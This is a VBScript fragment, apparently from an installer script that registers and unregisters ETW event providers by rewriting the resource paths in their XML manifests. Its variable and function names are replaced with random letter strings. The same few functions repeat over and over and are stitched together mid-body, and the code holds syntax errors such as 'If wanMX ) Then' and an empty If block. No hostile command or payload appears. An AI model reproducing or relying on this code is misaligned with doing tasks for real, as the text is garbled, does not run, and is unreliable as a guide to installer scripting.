jZqrl = RegExFolderPart.Replace ( jZqrl, GbTHa + "\" )
' If the resource DLLs referenced in the provider manifest are main OS DLLs
' then we don't include them in the OPK, instead we include a resource-only
' dll with the etw.dll suffix. For these DLLs we need to add the suffix here.
If 0 = InStr( messageFileName, "etw.dll" ) Then
messageFileName = RegExExtensionPart.Replace ( messageFileName, "etw.dll" )
End If
If 0 = InStr( jZqrl, "etw.dll" ) Then
End If
wanMX = RegExFolderPart.Replace ( VNYpK, njrls.ExpandEnvironmentStrings("%TEMP%") + "\" ) + ""
If wanMX ) Then
FixManifest = ""
Exit Function
End If
FixManifest = wanMX
End Function
'''''''''''''''''''''' rgnky ''''''''''''''''''''''
' Print usage baSTo
' Install Providers
' Uninstall Providers
Function kycEE
' If this is msi mode, uninstall failures are not fatal
If False = oPVGo Then
On Error Resume Next
End If
GbTHa = Session.TargetPath("ETWProviders")
EVhDM( GetRef("ipiCN") )
On Error Goto 0
End Function
'''''''''''''''''''''' rgnky ''''''''''''''''''''''
' Print usage baSTo
' Install Providers
' Uninstall Providers
Function kycEE
' If this is msi mode, uninstall failures are not fatal
If False = oPVGo Then
On Error Resume Next
End If
GbTHa = Session.TargetPath("ETWProviders")
EVhDM( GetRef("ipiCN") )
On Error Goto 0
End Function
' Enumerates over the provider manifests
Function EVhDM( YWQyi )
Dim sCOEt, GXnlH, File
' Remove possible trailing backslash
If Right(GbTHa, 1) = "\" Then
GbTHa = Left(GbTHa, Len(GbTHa) - 1)
End If
' Uninstall an ETW Provider
' Create a fixed-up copy of a provider manifest
Dim lpzfh, dtywx, JoGki, ASaBf
Dim wanMX, messageFileName, jZqrl
Set lpzfh = CreateObject("msxml2.DOMDocument.3.0")
lpzfh.async = false
lpzfh.resolveExternals = false
lpzfh.validateOnParse = false
If Not lpzfh.load( VNYpK ) Then
FixManifest = ""
Exit Function
End If
Set dtywx = lpzfh.SelectNodes("//*/provider")
If dtywx Is Nothing Then
FixManifest = ""
Exit Function
End If
For Each JoGki In dtywx
Set ASaBf = JoGki.attributes
messageFileName = ASaBf.getNamedItem("messageFileName").nodeValue
messageFileName = RegExFolderPart.Replace ( messageFileName, GbTHa + "\" )
jZqrl = RegExFolderPart.Replace ( jZqrl, GbTHa + "\" )
' If the resource DLLs referenced in the provider manifest are main OS DLLs
' then we don't include them in the OPK, instead we include a resource-only
' dll with the etw.dll suffix. For these DLLs we need to add the suffix here.
If 0 = InStr( messageFileName, "etw.dll" ) Then
messageFileName = RegExExtensionPart.Replace ( messageFileName, "etw.dll" )
End If
If 0 = InStr( jZqrl, "etw.dll" ) Then
End If
wanMX = RegExFolderPart.Replace ( VNYpK, njrls.ExpandEnvironmentStrings("%TEMP%") + "\" ) + ""
If wanMX ) Then
FixManifest = ""
Exit Function
End If
FixManifest = wanMX
End Function
'''''''''''''''''''''' rgnky ''''''''''''''''''''''
' Print usage baSTo
' Install Providers
' Uninstall Providers
Function kycEE
' If this is msi mode, uninstall failures are not fatal
If False = oPVGo Then
On Error Resume Next
End If
GbTHa = Session.TargetPath("ETWProviders")
EVhDM( GetRef("ipiCN") )
On Error Goto 0
End Function
'''''''''''''''''''''' rgnky ''''''''''''''''''''''
' Print usage baSTo
' Install Providers
' Uninstall Providers
Function kycEE
' If this is msi mode, uninstall failures are not fatal
If False = oPVGo Then
On Error Resume Next
End If
GbTHa = Session.TargetPath("ETWProviders")
EVhDM( GetRef("ipiCN") )
On Error Goto 0
End Function
' Enumerates over the provider manifests
Function EVhDM( YWQyi )
Dim sCOEt, GXnlH, File
' Remove possible trailing backslash
If Right(GbTHa, 1) = "\" Then
GbTHa = Left(GbTHa, Len(GbTHa) - 1)
End If
' Uninstall an ETW Provider
' Create a fixed-up copy of a provider manifest
Dim lpzfh, dtywx, JoGki, ASaBf
Dim wanMX, messageFileName, jZqrl
Set lpzfh = CreateObject("msxml2.DOMDocument.3.0")
lpzfh.async = false
lpzfh.resolveExternals = false
lpzfh.validateOnParse = false
If Not lpzfh.load( VNYpK ) Then
FixManifest = ""
Exit Function
End If
Set dtywx = lpzfh.SelectNodes("//*/provider")
If dtywx Is Nothing Then
FixManifest = ""
Exit Function
End If
For Each JoGki In dtywx
Set ASaBf = JoGki.attributes
messageFileName = ASaBf.getNamedItem("messageFileName").nodeValue
messageFileName = RegExFolderPart.Replace ( messageFileName, GbTHa + "\" )
jZqrl = RegExFolderPart.Replace ( jZqrl, GbTHa + "\" )
' If the resource DLLs referenced in the provider manifest are main OS DLLs
' then we don't include them in the OPK, instead we include a resource-only
' dll with the etw.dll suffix. For these DLLs we need to add the suffix here.
If 0 = InStr( messageFileName, "etw.dll" ) Then
messageFileName = RegExExtensionPart.Replace ( messageFileName, "etw.dll" )
End If
If 0 = InStr( jZqrl, "etw.dll" ) Then
End If
wanMX = RegExFolderPart.Replace ( VNYpK, njrls.ExpandEnvironmentStrings("%TEMP%") + "\" ) + ""
If wanMX ) Then
FixManifest = ""
Exit Function
End If
FixManifest = wanMX
End Function
'''''''''''''''''''''' rgnky ''''''''''''''''''''''
' Print usage baSTo
' Install Providers
' Uninstall Providers
Function kycEE
' If this is msi mode, uninstall failures are not fatal
If False = oPVGo Then
On Error Resume Next
End If
GbTHa = Session.TargetPath("ETWProviders")
EVhDM( GetRef("ipiCN") )
On Error Goto 0
End Function
'''''''''''''''''''''' rgnky ''''''''''''''''''''''
' Print usage baSTo
' Install Providers
' Uninstall Providers
Function kycEE
' If this is msi mode, uninstall failures are not fatal
If False = oPVGo Then
On Error Resume Next
End If
GbTHa = Session.TargetPath("ETWProviders")
EVhDM( GetRef("ipiCN") )
On Error Goto 0
End Function
' Enumerates over the provider manifests
Function EVhDM( YWQyi )
Dim sCOEt, GXnlH, File
' Remove possible trailing backslash
If Right(GbTHa, 1) = "\" Then
GbTHa = Left(GbTHa, Len(GbTHa) - 1)
End If
' Uninstall an ETW Provider
' Create a fixed-up copy of a provider manifest
Dim lpzfh, dtywx, JoGki, ASaBf
Dim wanMX, messageFileName, jZqrl
Set lpzfh = CreateObject("msxml2.DOMDocument.3.0")
lpzfh.async = false
lpzfh.resolveExternals = false
lpzfh.validateOnParse = false
If Not lpzfh.load( VNYpK ) Then
FixManifest = ""
Exit Function
End If
Set dtywx = lpzfh.SelectNodes("//*/provider")
If dtywx Is Nothing Then
FixManifest = ""
Exit Function
End If
For Each JoGki In dtywx
Set ASaBf = JoGki.attributes
messageFileName = ASaBf.getNamedItem("messageFileName").nodeValue
messageFileName = RegExFolderPart.Replace ( messageFileName, GbTHa + "\" )
jZqrl = RegExFolderPart.Replace ( jZqrl, GbTHa + "\" )
' If the resource DLLs referenced in the provider manifest are main OS DLLs
' then we don't include them in the OPK, instead we include a resource-only
' dll with the etw.dll suffix. For these DLLs we need to add the suffix here.
If 0 = InStr( messageFileName, "etw.dll" ) Then
messageFileName = RegExExtensionPart.Replace ( messageFileName, "etw.dll" )
End If
If 0 = InStr( jZqrl, "etw.dll" ) Then
End If
wanMX = RegExFolderPart.Replace ( VNYpK, njrls.ExpandEnvironmentStrings("%TEMP%") + "\" ) + ""
If wanMX ) Then
FixManifest = ""
Exit Function
End If
FixManifest = wanMX
End Function
'''''''''''''''''''''' rgnky ''''''''''''''''''''''
' Print usage baSTo
' Install Providers
' Uninstall Providers
Function kycEE
' If this is msi mode, uninstall failures are not fatal
If False = oPVGo Then
On Error Resume Next
End If
GbTHa = Session.TargetPath("ETWProviders")
EVhDM( GetRef("ipiCN") )
On Error Goto 0
End Function
'''''''''''''''''''''' rgnky ''''''''''''''''''''''
' Print usage baSTo
' Install Providers
' Uninstall Providers
Function kycEE
' If this is msi mode, uninstall failures are not fatal
If False = oPVGo Then
On Error Resume Next
End If
GbTHa = Session.TargetPath("ETWProviders")
EVhDM( GetRef("ipiCN") )
On Error Goto 0
End Function
' Enumerates over the provider manifests
Function EVhDM( YWQyi )
Dim sCOEt, GXnlH, File
' Remove possible trailing backslash
If Right(GbTHa, 1) = "\" Then
GbTHa = Left(GbTHa, Len(GbTHa) - 1)
End If
' Uninstall an ETW Provider
' Create a fixed-up copy of a provider manifest
Dim lpzfh, dtywx, JoGki, ASaBf
Dim wanMX, messageFileName, jZqrl
Set lpzfh = CreateObject("msxml2.DOMDocument.3.0")
lpzfh.async = false
lpzfh.resolveExternals = false
lpzfh.validateOnParse = false
If Not lpzfh.load( VNYpK ) Then
FixManifest = ""
Exit Function
End If
Set dtywx = lpzfh.SelectNodes("//*/provider")
If dtywx Is Nothing Then
FixManifest = ""
Exit Function
End If
For Each JoGki In dtywx
Set ASaBf = JoGki.attributes
messageFileName = ASaBf.getNamedItem("messageFileName").nodeValue
messageFileName = RegExFolderPart.Replace ( messageFileName, GbTHa + "\" )
jZqrl = RegExFolderPart.Replace ( jZqrl, GbTHa + "\" )
' If the resource DLLs referenced in the provider manifest are main OS DLLs
' then we don't include them in the OPK, instead we include a resource-only
' dll with the etw.dll suffix. For these DLLs we need to add the suffix here.
If 0 = InStr( messageFileName, "etw.dll" ) Then
messageFileName = RegExExtensionPart.Replace ( messageFileName, "etw.dll" )
End If
If 0 = InStr( jZqrl, "etw.dll" ) Then
End If
wanMX = RegExFolderPart.Replace ( VNYpK, njrls.ExpandEnvironmentStrings("%TEMP%") + "\" ) + ""
If wanMX ) Then
FixManifest = ""
Exit Function
End If
FixManifest = wanMX
End Function
'''''''''''''''''''''' rgnky ''''''''''''''''''''''
' Print usage baSTo
' Install Providers
' Uninstall Providers
Function kycEE
' If this is msi mode, uninstall failures are not fatal
If False = oPVGo Then
On Error Resume Next
End If
GbTHa = Session.TargetPath("ETWProviders")
EVhDM( GetRef("ipiCN") )
On Error Goto 0
End Function
' Enumerates over the provider manifests
Function EVhDM( YWQyi )
Dim sCOEt, GXnlH, File
' Remove possible trailing backslash
If Right(GbTHa, 1) = "\" Then
GbTHa = Left(GbTHa, Len(GbTHa) - 1)
End If
' Uninstall an ETW Provider
' Create a fixed-up copy of a provider manifest
Dim lpzfh, dtywx, JoGki, ASaBf
Dim wanMX, messageFileName, jZqrl
Set lpzfh = CreateObject("msxml2.DOMDocument.3.0")
lpzfh.async = false
lpzfh.resolveExternals = false
lpzfh.validateOnParse = false
If Not lpzfh.load( VNYpK ) Then
FixManifest = ""
Exit Function
End If
Set dtywx = lpzfh.SelectNodes("//*/provider")
If dtywx Is Nothing Then
FixManifest = ""
Exit Function
End If
For Each JoGki In dtywx
Set ASaBf = JoGki.attributes
messageFileName = ASaBf.getNamedItem("messageFileName").nodeValue
messageFileName = RegExFolderPart.Replace ( messageFileName, GbTHa + "\" )
jZqrl = RegExFolderPart.Replace ( jZqrl, GbTHa + "\" )
' If the resource DLLs referenced in the provider manifest are main OS DLLs
' then we don't include them in the OPK, instead we include a resource-only
' dll with the etw.dll suffix. For these DLLs we need to add the suffix here.
If 0 = InStr( messageFileName, "etw.dll" ) Then
messageFileName = RegExExtensionPart.Replace ( messageFileName, "etw.dll" )
End If
If 0 = InStr( jZqrl, "etw.dll" ) Then
End If
wanMX = RegExFolderPart.Replace ( VNYpK, njrls.ExpandEnvironmentStrings("%TEMP%") + "\" ) + ""
If wanMX ) Then
FixManifest = ""
Exit Function
End If
FixManifest = wanMX
End Function
'''''''''''''''''''''' rgnky ''''''''''''''''''''''
' Print usage baSTo
' Install Providers
' Uninstall Providers
Function kycEE
' If this is msi mode, uninstall failures are not fatal
If False = oPVGo Then
On Error Resume Next
End If
GbTHa = Session.TargetPath("ETWProviders")
EVhDM( GetRef("ipiCN") )
On Error Goto 0
End Function
' Enumerates over the provider manifests
Function EVhDM( YWQyi )
Dim sCOEt, GXnlH, File
' Remove possible trailing backslash
If Right(GbTHa, 1) = "\" Then
GbTHa = Left(GbTHa, Len(GbTHa) - 1)
End If
' Uninstall an ETW Provider
' Create a fixed-up copy of a provider manifest
Dim lpzfh, dtywx, JoGki, ASaBf
Dim wanMX, messageFileName, jZqrl
Set lpzfh = CreateObject("msxml2.DOMDocument.3.0")
lpzfh.async = false
lpzfh.resolveExternals = false
lpzfh.validateOnParse = false
If Not lpzfh.load( VNYpK ) Then
FixManifest = ""
Exit Function
End If
Set dtywx = lpzfh.SelectNodes("//*/provider")
If dtywx Is Nothing Then
FixManifest = ""
Exit Function
End If
For Each JoGki In dtywx
Set ASaBf = JoGki.attributes
messageFileName = ASaBf.getNamedItem("messageFileName").nodeValue
messageFileName = RegExFolderPart.Replace ( messageFileName, GbTHa + "\" )
jZqrl = RegExFolderPart.Replace ( jZqrl, GbTHa + "\" )
' If the resource DLLs referenced in the provider manifest are main OS DLLs
' then we don't include them in the OPK, instead we include a resource-only
' dll with the etw.dll suffix. For these DLLs we need to add the suffix here.
If 0 = InStr( messageFileName, "etw.dll" ) Then
messageFileName = RegExExtensionPart.Replace ( messageFileName, "etw.dll" )
End If
If 0 = InStr( jZqrl, "etw.dll" ) Then
End If
wanMX = RegExFolderPart.Replace ( VNYpK, njrls.ExpandEnvironmentStrings("%TEMP%") + "\" ) + ""
If wanMX ) Then
FixManifest = ""
Exit Function
End If
FixManifest = wanMX
End Function
'''''''''''''''''''''' rgnky ''''''''''''''''''''''
' Print usage baSTo
' Install Providers
' Uninstall Providers
Function kycEE
' If this is msi mode, uninstall failures are not fatal
If False = oPVGo Then
On Error Resume Next
End If
GbTHa = Session.TargetPath("ETWProviders")
EVhDM( GetRef("ipiCN") )
On Error Goto 0
End Function
' Enumerates over the provider manifests
Function EVhDM( YWQyi )
Dim sCOEt, GXnlH, File
' Remove possible trailing backslash
If Right(GbTHa, 1) = "\" Then
GbTHa = Left(GbTHa, Len(GbTHa) - 1)
End If
' Uninstall an ETW Provider
' Create a fixed-up copy of a provider manifest
Dim lpzfh, dtywx, JoGki, ASaBf
Dim wanMX, messageFileName, jZqrl
Set lpzfh = CreateObject("msxml2.DOMDocument.3.0")
lpzfh.async = false
lpzfh.resolveExternals = false
lpzfh.validateOnParse = false
If Not lpzfh.load( VNYpK ) Then
FixManifest = ""
Exit Function
End If
Set dtywx = lpzfh.SelectNodes("//*/provider")
If dtywx Is Nothing Then
FixManifest = ""
Exit Function
End If
For Each JoGki In dtywx
Set ASaBf = JoGki.attributes
messageFileName = ASaBf.getNamedItem("messageFileName").nodeValue
messageFileName = RegExFolderPart.Replace ( messageFileName, GbTHa + "\" )
jZqrl = RegExFolderPart.Replace ( jZqrl, GbTHa + "\" )
' If the resource DLLs referenced in the provider manifest are main OS DLLs
' then we don't include them in the OPK, instead we include a resource-only
' dll with the etw.dll suffix. For these DLLs we need to add the suffix here.
If 0 = InStr( messageFileName, "etw.dll" ) Then
messageFileName = RegExExtensionPart.Replace ( messageFileName, "etw.dll" )
End If
If 0 = InStr( jZqrl, "etw.dll" ) Then
End If
wanMX = RegExFolderPart.Replace ( VNYpK, njrls.ExpandEnvironmentStrings("%TEMP%") + "\" ) + ""
If wanMX ) Then
FixManifest = ""
Exit Function
End If
FixManifest = wanMX
End Function
'''''''''''''''''''''' rgnky ''''''''''''''''''''''
' Print usage baSTo
' Install Providers
' Uninstall Providers
Function kycEE
' If this is msi mode, uninstall failures are not fatal
If False = oPVGo Then
On Error Resume Next
End If
GbTHa = Session.TargetPath("ETWProviders")
EVhDM( GetRef("ipiCN") )
On Error Goto 0
End Function
' Enumerates over the provider manifests
Function EVhDM( YWQyi )
Dim sCOEt, GXnlH, File
' Remove possible trailing backslash
If Right(GbTHa, 1) = "\" Then
GbTHa = Left(GbTHa, Len(GbTHa) - 1)
End If
' Uninstall an ETW Provider
' Create a fixed-up copy of a provider manifest
Dim lpzfh, dtywx, JoGki, ASaBf
Dim wanMX, messageFileName, jZqrl
Set lpzfh = CreateObject("msxml2.DOMDocument.3.0")
lpzfh.async = false
lpzfh.resolveExternals = false
lpzfh.validateOnParse = false
If Not lpzfh.load( VNYpK ) Then
FixManifest = ""
Exit Function
End If
Set dtywx = lpzfh.SelectNodes("//*/provider")
If dtywx Is Nothing Then
FixManifest = ""
Exit Function
End If
For Each JoGki In dtywx
Set ASaBf = JoGki.attributes
messageFileName = ASaBf.getNamedItem("messageFileName").nodeValue
messageFileName = RegExFolderPart.Replace ( messageFileName, GbTHa + "\" )
jZqrl = RegExFolderPart.Replace ( jZqrl, GbTHa + "\" )
' If the resource DLLs referenced in the provider manifest are main OS DLLs
' then we don't include them in the OPK, instead we include a resource-only
' dll with the etw.dll suffix. For these DLLs we need to add the suffix here.
If 0 = InStr( messageFileName, "etw.dll" ) Then
messageFileName = RegExExtensionPart.Replace ( messageFileName, "etw.dll" )
End If
If 0 = InStr( jZqrl, "etw.dll" ) Then
End If
wanMX = RegExFolderPart.Replace ( VNYpK, njrls.ExpandEnvironmentStrings("%TEMP%") + "\" ) + ""
If wanMX ) Then
FixManifest = ""
Exit Function
End If
FixManifest = wanMX
End Function
'''''''''''''''''''''' rgnky ''''''''''''''''''''''
' Print usage baSTo
' Install Providers
' Uninstall Providers
Function kycEE
' If this is msi mode, uninstall failures are not fatal
If False = oPVGo Then
On Error Resume Next
End If
GbTHa = Session.TargetPath("ETWProviders")
EVhDM( GetRef("ipiCN") )
On Error Goto 0
End Function
' Enumerates over the provider manifests
Function EVhDM( YWQyi )
Dim sCOEt, GXnlH, File
' Remove possible trailing backslash
If Right(GbTHa, 1) = "\" Then
GbTHa = Left(GbTHa, Len(GbTHa) - 1)
End If
' Uninstall an ETW Provider
' Create a fixed-up copy of a provider manifest
Dim lpzfh, dtywx, JoGki, ASaBf
Dim wanMX, messageFileName, jZqrl
Set lpzfh = CreateObject("msxml2.DOMDocument.3.0")
lpzfh.async = false
lpzfh.resolveExternals = false
lpzfh.validateOnParse = false
If Not lpzfh.load( VNYpK ) Then
FixManifest = ""
Exit Function
End If
Set dtywx = lpzfh.SelectNodes("//*/provider")
If dtywx Is Nothing Then
FixManifest = ""
Exit Function
End If
For Each JoGki In dtywx
Set ASaBf = JoGki.attributes
messageFileName = ASaBf.getNamedItem("messageFileName").nodeValue
messageFileName = RegExFolderPart.Replace ( messageFileName, GbTHa + "\" )
jZqrl = RegExFolderPart.Replace ( jZqrl, GbTHa + "\" )
' If the resource DLLs referenced in the provider manifest are main OS DLLs
' then we don't include them in the OPK, instead we include a resource-only
' dll with the etw.dll suffix. For these DLLs we need to add the suffix here.
If 0 = InStr( messageFileName, "etw.dll" ) Then
messageFileName = RegExExtensionPart.Replace ( messageFileName, "etw.dll" )
End If
If 0 = InStr( jZqrl, "etw.dll" ) Then
End If
wanMX = RegExFolderPart.Replace ( VNYpK, njrls.ExpandEnvironmentStrings("%TEMP%") + "\" ) + ""
If wanMX ) Then
FixManifest = ""
Exit Function
End If
FixManifest = wanMX
End Function
'''''''''''''''''''''' rgnky ''''''''''''''''''''''
' Print usage baSTo
' Install Providers
' Uninstall Providers
Function kycEE
' If this is msi mode, uninstall failures are not fatal
If False = oPVGo Then
On Error Resume Next
End If
GbTHa = Session.TargetPath("ETWProviders")
EVhDM( GetRef("ipiCN") )
On Error Goto 0
End Function
' Enumerates over the provider manifests
Function EVhDM( YWQyi )
Dim sCOEt, GXnlH, File
' Remove possible trailing backslash
If Right(GbTHa, 1) = "\" Then
GbTHa = Left(GbTHa, Len(GbTHa) - 1)
End If
' Uninstall an ETW Provider
' Create a fixed-up copy of a provider manifest
Dim lpzfh, dtywx, JoGki, ASaBf
Dim wanMX, messageFileName, jZqrl
Set lpzfh = CreateObject("msxml2.DOMDocument.3.0")
lpzfh.async = false
lpzfh.resolveExternals = false
lpzfh.validateOnParse = false
If Not lpzfh.load( VNYpK ) Then
FixManifest = ""
Exit Function
End If
Set dtywx = lpzfh.SelectNodes("//*/provider")
If dtywx Is Nothing Then
FixManifest = ""
Exit Function
End If
For Each JoGki In dtywx
Set ASaBf = JoGki.attributes
messageFileName = ASaBf.getNamedItem("messageFileName").nodeValue
messageFileName = RegExFolderPart.Replace ( messageFileName, GbTHa + "\" )
jZqrl = RegExFolderPart.Replace ( jZqrl, GbTHa + "\" )
' If the resource DLLs referenced in the provider manifest are main OS DLLs
' then we don't include them in the OPK, instead we include a resource-only
' dll with the etw.dll suffix. For these DLLs we need to add the suffix here.
If 0 = InStr( messageFileName, "etw.dll" ) Then
messageFileName = RegExExtensionPart.Replace ( messageFileName, "etw.dll" )
End If
If 0 = InStr( jZqrl, "etw.dll" ) Then
End If
wanMX = RegExFolderPart.Replace ( VNYpK, njrls.ExpandEnvironmentStrings("%TEMP%") + "\" ) + ""
If wanMX ) Then
FixManifest = ""
Exit Function
End If
FixManifest = wanMX
End Function
'''''''''''''''''''''' rgnky ''''''''''''''''''''''
' Print usage baSTo
' Install Providers
' Uninstall Providers
Function kycEE
' If this is msi mode, uninstall failures are not fatal
If False = oPVGo Then
On Error Resume Next
End If
GbTHa = Session.TargetPath("ETWProviders")
EVhDM( GetRef("ipiCN") )
On Error Goto 0
End Function
' Enumerates over the provider manifests
Function EVhDM( YWQyi )
Dim sCOEt, GXnlH, File
' Remove possible trailing backslash
If Right(GbTHa, 1) = "\" Then
GbTHa = Left(GbTHa, Len(GbTHa) - 1)
End If
' Uninstall an ETW Provider
' Create a fixed-up copy of a provider manifest
Dim lpzfh, dtywx, JoGki, ASaBf
Dim wanMX, messageFileName, jZqrl
Set lpzfh = CreateObject("msxml2.DOMDocument.3.0")
lpzfh.async = false
lpzfh.resolveExternals = false
lpzfh.validateOnParse = false
If Not lpzfh.load( VNYpK ) Then
FixManifest = ""
Exit Function
End If
Set dtywx = lpzfh.SelectNodes("//*/provider")
If dtywx Is Nothing Then
FixManifest = ""
Exit Function
End If
For Each JoGki In dtywx
Set ASaBf = JoGki.attributes
messageFileName = ASaBf.getNamedItem("messageFileName").nodeValue
messageFileName = RegExFolderPart.Replace ( messageFileName, GbTHa + "\" )
jZqrl = RegExFolderPart.Replace ( jZqrl, GbTHa + "\" )
' If the resource DLLs referenced in the provider manifest are main OS DLLs
' then we don't include them in the OPK, instead we include a resource-only
' dll with the etw.dll suffix. For these DLLs we need to add the suffix here.
If 0 = InStr( messageFileName, "etw.dll" ) Then
messageFileName = RegExExtensionPart.Replace ( messageFileName, "etw.dll" )
End If
If 0 = InStr( jZqrl, "etw.dll" ) Then
End If
wanMX = RegExFolderPart.Replace ( VNYpK, njrls.ExpandEnvironmentStrings("%TEMP%") + "\" ) + ""
If wanMX ) Then
FixManifest = ""
Exit Function
End If
FixManifest = wanMX
End Function
'''''''''''''''''''''' rgnky ''''''''''''''''''''''
' Print usage baSTo
' Install Providers
' Uninstall Providers
Function kycEE
' If this is msi mode, uninstall failures are not fatal
If False = oPVGo Then
On Error Resume Next
End If
GbTHa = Session.TargetPath("ETWProviders")
EVhDM( GetRef("ipiCN") )
On Error Goto 0
End Function
' Enumerates over the provider manifests
Function EVhDM( YWQyi )
Dim sCOEt, GXnlH, File
' Remove possible trailing backslash
If Right(GbTHa, 1) = "\" Then
GbTHa = Left(GbTHa, Len(GbTHa) - 1)
End If
' Uninstall an ETW Provider
' Create a fixed-up copy of a provider manifest
Dim lpzfh, dtywx, JoGki, ASaBf
Dim wanMX, messageFileName, jZqrl
Set lpzfh = CreateObject("msxml2.DOMDocument.3.0")
lpzfh.async = false
lpzfh.resolveExternals = false
lpzfh.validateOnParse = false
If Not lpzfh.load( VNYpK ) Then
FixManifest = ""
Exit Function
End If
Set dtywx = lpzfh.SelectNodes("//*/provider")
If dtywx Is Nothing Then
FixManifest = ""
Exit Function
End If
For Each JoGki In dtywx
Set ASaBf = JoGki.attributes
messageFileName = ASaBf.getNamedItem("messageFileName").nodeValue
messageFileName = RegExFolderPart.Replace ( messageFileName, GbTHa + "\" )
jZqrl = RegExFolderPart.Replace ( jZqrl, GbTHa + "\" )
' If the resource DLLs referenced in the provider manifest are main OS DLLs
' then we don't include them in the OPK, instead we include a resource-only
' dll with the etw.dll suffix. For these DLLs we need to add the suffix here.
If 0 = InStr( messageFileName, "etw.dll" ) Then
messageFileName = RegExExtensionPart.Replace ( messageFileName, "etw.dll" )
End If
If 0 = InStr( jZqrl, "etw.dll" ) Then
End If
wanMX = RegExFolderPart.Replace ( VNYpK, njrls.ExpandEnvironmentStrings("%TEMP%") + "\" ) + ""
If wanMX ) Then
FixManifest = ""
Exit Function
End If
FixManifest = wanMX
End Function
'''''''''''''''''''''' rgnky ''''''''''''''''''''''
' Print usage baSTo
' Install Providers
' Uninstall Providers
Function kycEE
' If this is msi mode, uninstall failures are not fatal
If False = oPVGo Then
On Error Resume Next
End If
GbTHa = Session.TargetPath("ETWProviders")
EVhDM( GetRef("ipiCN") )
On Error Goto 0
End Function
' Enumerates over the provider manifests
Function EVhDM( YWQyi )
Dim sCOEt, GXnlH, File
' Remove possible trailing backslash
If Right(GbTHa, 1) = "\" Then
GbTHa = Left(GbTHa, Len(GbTHa) - 1)
End If
' Uninstall an ETW Provider
' Create a fixed-up copy of a provider manifest
Dim lpzfh, dtywx, JoGki, ASaBf
Dim wanMX, messageFileName, jZqrl
Set lpzfh = CreateObject("msxml2.DOMDocument.3.0")
lpzfh.async = false
lpzfh.resolveExternals = false
lpzfh.validateOnParse = false
If Not lpzfh.load( VNYpK ) Then
FixManifest = ""
Exit Function
End If
Set dtywx = lpzfh.SelectNodes("//*/provider")
If dtywx Is Nothing Then
FixManifest = ""
Exit Function
End If
For Each JoGki In dtywx
Set ASaBf = JoGki.attributes
messageFileName = ASaBf.getNamedItem("messageFileName").nodeValue
messageFileName = RegExFolderPart.Replace ( messageFileName, GbTHa + "\" )
jZqrl = RegExFolderPart.Replace ( jZqrl, GbTHa + "\" )
' If the resource DLLs referenced in the provider manifest are main OS DLLs
' then we don't include them in the OPK, instead we include a resource-only
' dll with the etw.dll suffix. For these DLLs we need to add the suffix here.
If 0 = InStr( messageFileName, "etw.dll" ) Then
messageFileName = RegExExtensionPart.Replace ( messageFileName, "etw.dll" )
End If
If 0 = InStr( jZqrl, "etw.dll" ) Then
End If
wanMX = RegExFolderPart.Replace ( VNYpK, njrls.ExpandEnvironmentStrings("%TEMP%") + "\" ) + ""
If wanMX ) Then
FixManifest = ""
Exit Function
End If
FixManifest = wanMX
End Function
'''''''''''''''''''''' rgnky ''''''''''''''''''''''
' Print usage baSTo
' Install Providers
' Uninstall Providers
Function kycEE
' If this is msi mode, uninstall failures are not fatal
If False = oPVGo Then
On Error Resume Next
End If
GbTHa = Session.TargetPath("ETWProviders")
EVhDM( GetRef("ipiCN") )
On Error Goto 0
End Function
' Enumerates over the provider manifests
Function EVhDM( YWQyi )
Dim sCOEt, GXnlH, File
' Remove possible trailing backslash
If Right(GbTHa, 1) = "\" Then
GbTHa = Left(GbTHa, Len(GbTHa) - 1)
End If
' Uninstall an ETW Provider
' Create a fixed-up copy of a provider manifest
Dim lpzfh, dtywx, JoGki, ASaBf
Dim wanMX, messageFileName, jZqrl
Set lpzfh = CreateObject("msxml2.DOMDocument.3.0")
lpzfh.async = false
lpzfh.resolveExternals = false
lpzfh.validateOnParse = false
If Not lpzfh.load( VNYpK ) Then
FixManifest = ""
Exit Function
End If
Set dtywx = lpzfh.SelectNodes("//*/provider")
If dtywx Is Nothing Then
FixManifest = ""
Exit Function
End If
For Each JoGki In dtywx
Set ASaBf = JoGki.attributes
messageFileName = ASaBf.getNamedItem("messageFileName").nodeValue
messageFileName = RegExFolderPart.Replace ( messageFileName, GbTHa + "\" )
jZqrl = RegExFolderPart.Replace ( jZqrl, GbTHa + "\" )
' If the resource DLLs referenced in the provider manifest are main OS DLLs
' then we don't include them in the OPK, instead we include a resource-only
' dll with the etw.dll suffix. For these DLLs we need to add the suffix here.
If 0 = InStr( messageFileName, "etw.dll" ) Then
messageFileName = RegExExtensionPart.Replace ( messageFileName, "etw.dll" )
End If
If 0 = InStr( jZqrl, "etw.dll" ) Then
End If
wanMX = RegExFolderPart.Replace ( VNYpK, njrls.ExpandEnvironmentStrings("%TEMP%") + "\" ) + ""
If wanMX ) Then
FixManifest = ""
Exit Function
End If
FixManifest = wanMX
End Function
'''''''''''''''''''''' rgnky ''''''''''''''''''''''
' Print usage baSTo
' Install Providers
' Uninstall Providers
Function kycEE
' If this is msi mode, uninstall failures are not fatal
If False = oPVGo Then
On Error Resume Next
End If
GbTHa = Session.TargetPath("ETWProviders")
EVhDM( GetRef("ipiCN") )
On Error Goto 0
End Function
' Enumerates over the provider manifests
Function EVhDM( YWQyi )
Dim sCOEt, GXnlH, File
' Remove possible trailing backslash
If Right(GbTHa, 1) = "\" Then
GbTHa = Left(GbTHa, Len(GbTHa) - 1)
End If
' Uninstall an ETW Provider
' Create a fixed-up copy of a provider manifest
Dim lpzfh, dtywx, JoGki, ASaBf
Dim wanMX, messageFileName, jZqrl
Set lpzfh = CreateObject("msxml2.DOMDocument.3.0")
lpzfh.async = false
lpzfh.resolveExternals = false
lpzfh.validateOnParse = false
If Not lpzfh.load( VNYpK ) Then
FixManifest = ""
Exit Function
End If
Set dtywx = lpzfh.SelectNodes("//*/provider")
If dtywx Is Nothing Then
FixManifest = ""
Exit Function
End If
For Each JoGki In dtywx
Set ASaBf = JoGki.attributes
messageFileName = ASaBf.getNamedItem("messageFileName").nodeValue
messageFileName = RegExFolderPart.Replace ( messageFileName, GbTHa + "\" )
jZqrl = RegExFolderPart.Replace ( jZqrl, GbTHa + "\" )
' If the resource DLLs referenced in the provider manifest are main OS DLLs
' then we don't include them in the OPK, instead we include a resource-only
' dll with the etw.dll suffix. For these DLLs we need to add the suffix here.
If 0 = InStr( messageFileName, "etw.dll" ) Then
messageFileName = RegExExtensionPart.Replace ( messageFileName, "etw.dll" )
End If
If 0 = InStr( jZqrl, "etw.dll" ) Then
End If
wanMX = RegExFolderPart.Replace ( VNYpK, njrls.ExpandEnvironmentStrings("%TEMP%") + "\" ) + ""
If wanMX ) Then
FixManifest = ""
Exit Function
End If
